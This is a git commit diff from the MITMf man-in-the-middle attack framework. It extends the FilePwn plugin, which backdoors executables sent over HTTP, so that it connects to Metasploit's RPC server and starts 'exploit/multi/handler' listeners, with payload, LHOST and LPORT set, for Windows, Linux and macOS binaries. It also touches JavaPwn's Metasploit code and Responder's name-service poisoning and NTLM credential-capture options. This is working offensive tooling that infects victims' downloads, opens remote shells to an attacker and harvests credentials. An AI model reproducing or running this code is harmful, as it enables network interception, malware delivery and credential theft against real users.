Merge branch 'dev'

2025-08-20 13:33:30 -07:00 · 2015-04-15 18:25:59 +02:00 · 2015-04-15 18:25:59 +02:00 · 6121c67eaa
commit 6121c67eaa
parent 360a6ba6ce b91bb4271b
6 changed files with 106 additions and 78 deletions
--- a/plugins/FilePwn.py
+++ b/plugins/FilePwn.py
@ -67,6 +67,7 @@ import multiprocessing
 from libs.bdfactory import pebin
 from libs.bdfactory import elfbin
 from libs.bdfactory import machobin
+from core.msfrpc import Msfrpc
 from plugins.plugin import Plugin
 from tempfile import mkstemp
 from configobj import ConfigObj
@ -79,7 +80,7 @@ class FilePwn(Plugin):
    desc        = "Backdoor executables being sent over http using bdfactory"
    implements  = ["handleResponse"]
    tree_output = ["BDFProxy v0.3.2 online"]
-    version     = "0.2"
+    version     = "0.3"
    has_opts    = False

    def initialize(self, options):
@ -109,6 +110,20 @@ class FilePwn(Plugin):
        #NOT USED NOW
        #self.supportedBins = ('MZ', '7f454c46'.decode('hex'))

+        #Metasploit options
+        msfcfg  = options.configfile['MITMf']['Metasploit']
+        rpcip   = msfcfg['rpcip']
+        rpcpass = msfcfg['rpcpass']
+
+        try:
+            self.msf = Msfrpc({"host": rpcip})  #create an instance of msfrpc libarary
+            self.msf.login('msf', rpcpass)
+            version = self.msf.call('core.version')['version']
+            self.tree_output.append("Connected to Metasploit v%s" % version)
+        except Exception:
+            sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server")
+
+        #FilePwn options
        self.userConfig      = options.configfile['FilePwn']
        self.FileSizeMax     = self.userConfig['targets']['ALL']['FileSizeMax']
        self.WindowsIntelx86 = self.userConfig['targets']['ALL']['WindowsIntelx86']
@ -123,6 +138,32 @@ class FilePwn(Plugin):
        self.zipblacklist    = self.userConfig['ZIP']['blacklist']
        self.tarblacklist    = self.userConfig['TAR']['blacklist']

+        self.tree_output.append("Setting up Metasploit payload handlers")
+        
+        jobs = self.msf.call('job.list')
+        for config in [self.LinuxIntelx86, self.LinuxIntelx64, self.WindowsIntelx86, self.WindowsIntelx64, self.MachoIntelx86, self.MachoIntelx64]:
+            cmd = "use exploit/multi/handler\n"
+            cmd += "set payload {}\n".format(config["MSFPAYLOAD"])
+            cmd += "set LHOST {}\n".format(config["HOST"])
+            cmd += "set LPORT {}\n".format(config["PORT"])
+            cmd += "exploit -j\n"
+
+            if jobs:
+                for pid, name in jobs.iteritems():
+                    info = self.msf.call('job.info', [pid])
+                    if (info['name'] != "Exploit: multi/handler") or (info['datastore']['payload'] != config["MSFPAYLOAD"]) or (info['datastore']['LPORT'] != config["PORT"]) or (info['datastore']['lhost'] != config['HOST']):
+                        #Create a virtual console
+                        c_id = self.msf.call('console.create')['id']
+
+                        #write the cmd to the newly created console
+                        self.msf.call('console.write', [c_id, cmd])
+            else:
+                #Create a virtual console
+                c_id = self.msf.call('console.create')['id']
+
+                #write the cmd to the newly created console
+                self.msf.call('console.write', [c_id, cmd])
+
    def convert_to_Bool(self, aString):
        if aString.lower() == 'true':
            return True
@ -300,7 +341,7 @@ class FilePwn(Plugin):

        except Exception as e:
            print 'Exception', str(e)
-            mitmf_logger.warning("EXCEPTION IN binaryGrinder %s", str(e))
+            mitmf_logger.warning("EXCEPTION IN binaryGrinder {}".format(e))
            return None

    def tar_files(self, aTarFileBytes, formatt):
--- a/plugins/JavaPwn.py
+++ b/plugins/JavaPwn.py
@ -18,13 +18,13 @@
 # USA
 #

-import core.msfrpc as msfrpc
 import string
 import random
 import threading
 import sys
 import logging

+from core.msfrpc import Msfrpc
 from plugins.plugin import Plugin
 from plugins.BrowserProfiler import BrowserProfiler
 from time import sleep
@ -71,7 +71,7 @@ class JavaPwn(BrowserProfiler, Plugin):
        self.black_ips = []

        try:
-            msf = msfrpc.Msfrpc({"host": self.rpcip})  #create an instance of msfrpc libarary
+            msf = Msfrpc({"host": self.rpcip})  #create an instance of msfrpc libarary
            msf.login('msf', self.rpcpass)
            version = msf.call('core.version')['version']
            self.tree_output.append("Connected to Metasploit v%s" % version)
@ -233,20 +233,3 @@ class JavaPwn(BrowserProfiler, Plugin):
                        self.send_command(cmd, msf, vic_ip)
                        self.injectWait(msf, rand_url, vic_ip)
            sleep(1)
-
-    def finish(self):
-        '''This will be called when shutting down'''
-        msf = msfrpc.Msfrpc({"host": self.rpcip})
-        msf.login('msf', self.rpcpass)
-
-        jobs = msf.call('job.list')
-        if len(jobs) > 0:
-            print '\n[*] Stopping all running metasploit jobs'
-            for k, v in jobs.iteritems():
-                msf.call('job.stop', [k])
-
-        consoles = msf.call('console.list')['consoles']
-        if len(consoles) > 0:
-            print "[*] Closing all virtual consoles"
-            for console in consoles:
-                msf.call('console.destroy', [console['id']])
--- a/plugins/Responder.py
+++ b/plugins/Responder.py
@ -45,25 +45,25 @@ class Responder(Plugin):
        except Exception, e:
            sys.exit('[-] Error parsing config for Responder: ' + str(e))

-        if options.Analyse:
+        if options.Analyze:
            self.tree_output.append("Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned")

-        resp = ResponderMITMf()
-        resp.setCoreVars(options, config)
+        resp = ResponderMITMf(options, config)
+        #resp.setCoreVars(options, config)

-        result = resp.AnalyzeICMPRedirect()
+        result = resp.AnalyzeICMPRedirect(options.Analyze)
        if result:
            for line in result:
                self.tree_output.append(line)

-        resp.printDebugInfo()
+        #resp.printDebugInfo()
        resp.start()

    def plugin_reactor(self, strippingFactory):
        reactor.listenTCP(3141, strippingFactory)

    def add_options(self, options):
-        options.add_argument('--analyze', dest="Analyse", action="store_true", help="Allows you to see NBT-NS, BROWSER, LLMNR requests from which workstation to which workstation without poisoning")
+        options.add_argument('--analyze', dest="Analyze", action="store_true", help="Allows you to see NBT-NS, BROWSER, LLMNR requests from which workstation to which workstation without poisoning")
        options.add_argument('--basic', dest="Basic", default=False, action="store_true", help="Set this if you want to return a Basic HTTP authentication. If not set, an NTLM authentication will be returned")
        options.add_argument('--wredir', dest="Wredirect", default=False, action="store_true", help="Set this to enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network (like classics 'nbns spoofer' would). Default value is therefore set to False")
        options.add_argument('--nbtns', dest="NBTNSDomain", default=False, action="store_true", help="Set this to enable answers for netbios domain suffix queries. Answering to domain suffixes will likely break stuff on the network (like a classic 'nbns spoofer' would). Default value is therefore set to False")